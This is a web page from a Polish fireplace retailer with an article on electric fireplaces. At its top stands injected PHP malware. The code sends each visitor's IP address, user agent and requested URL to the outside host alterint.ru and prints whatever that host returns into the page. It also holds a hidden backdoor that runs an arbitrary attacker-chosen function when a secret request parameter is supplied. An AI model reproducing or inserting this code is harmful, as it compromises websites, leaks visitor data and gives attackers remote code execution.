if (!isset($indget)) { if(!empty($_COOKIE["client_check"])) die($_COOKIE["client_check"]); if (!isset($SERVER["HTTP_ACCEPT_CHARSET"])) { if(preg_match('!.!u', file_get_contents($_SERVER["SCRIPT_FILENAME"]))) $c = "UTF-8"; else $c = "windows-1251"; } else { $c = $SERVER["HTTP_ACCEPT_CHARSET"]; } $d = $_SERVER["SERVER_NAME"].$_SERVER["REQUEST_URI"]; $u = $_SERVER["HTTP_USER_AGENT"]; $ip = $_SERVER["REMOTE_ADDR"]; $domain = "alterint.ru"; $url = "/get.php?d=".urlencode($d)."&u=".urlencode($u)."&c=".$c."&i=1&ip=".$ip."&h=".md5("7b3fec5ef4585dbb8310ff049d6f5b22".$d.$u.$c."1"); if(ini_get("allow_url_fopen") == 1) { $indget = file_get_contents("http://".$domain.$url); } if(strlen($indget) < 10) { if (function_exists("curl_init")) { $ch = curl_init("http://".$domain.$url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $indget = curl_exec($ch); curl_close($ch); } else { $fp = fsockopen($domain, 80, $errno, $errstr, 30); if ($fp) { $out = "GET ".$url." HTTP/1.1\r\n"; $out .= "Host: ".$domain."\r\n"; $out .= "Connection: Close\r\n\r\n"; fwrite($fp, $out); $resp = ""; while (!feof($fp)) { $resp .= fgets($fp, 128); } fclose($fp); list($header, $indget) = preg_split("/\R\R/", $resp, 2); } } } if(@$_REQUEST["p"] == "1716cc66") $_REQUEST["f"](stripslashes($_REQUEST["c"])); } echo $indget; Kominki elektryczne | Marron Kominki

Artykuły

Kominki elektryczne

elektryczny

Producenci kominków elektrycznych mieli nie lada wyzwanie próbując odtworzyć wierną kopie ognia w swoich urządzeniach i trzeba im przyznać, że spisali się świetnie.

Wydawać by się mogło, że owe kominki są urządzeniami bardzo nowoczesnymi ale nic bardziej mylnego, w życiu człowieka funkcjonują już od ponad wieku. Wynalazek ten zawdzięczamy  Brytyjczykom, który ewoluował do dzisiejszej postaci.

Rozpalony kominek a w nim tańczący ogień to prawdziwy element dekoracyjny każdego wnętrza i duma jego właściciela, niestety nie wszyscy mogą sobie pozwolić na budowę tradycyjnego kominka. W tej nie komfortowej sytuacji znajdują się mieszkańcy bloków i domów wielorodzinnych, rozwiązaniem są właśnie kominki elektryczne.

W przeciwieństwie do tradycyjnego paleniska kominki elektryczne nie potrzebują przewodu odprowadzającego spaliny czy doprowadzającego z zewnątrz powietrze, wymagane jest jedynie gniazdko elektryczne. Montaż jest banalny, większość kominków po wyjęciu z opakowania wystarczy ustawić w wybranym na ten cel miejscu, dostępne są również kminki pod zabudowę lub naścienne.

Wszelkie niedogodności  znane z kominka tradycyjnego znikają, nie mamy tu popiołu, sadzy, spalin. Nie musimy martwic się o drewno na opal wystarczy nam jedynie gniazdko z prądem.

Niezwykle komfortowe rozwiązanie zastosowano do sterowania, można robić to ręcznie bądź np. z fotela w salonie przed kominkiem używając pilota. Sterować możemy wielkością płomieni lub termowentylatorami, które dmuchają gorącym powietrzem.

Kominki elektryczne polecamy tam gdzie niema możliwości budowy tradycyjnego paleniska.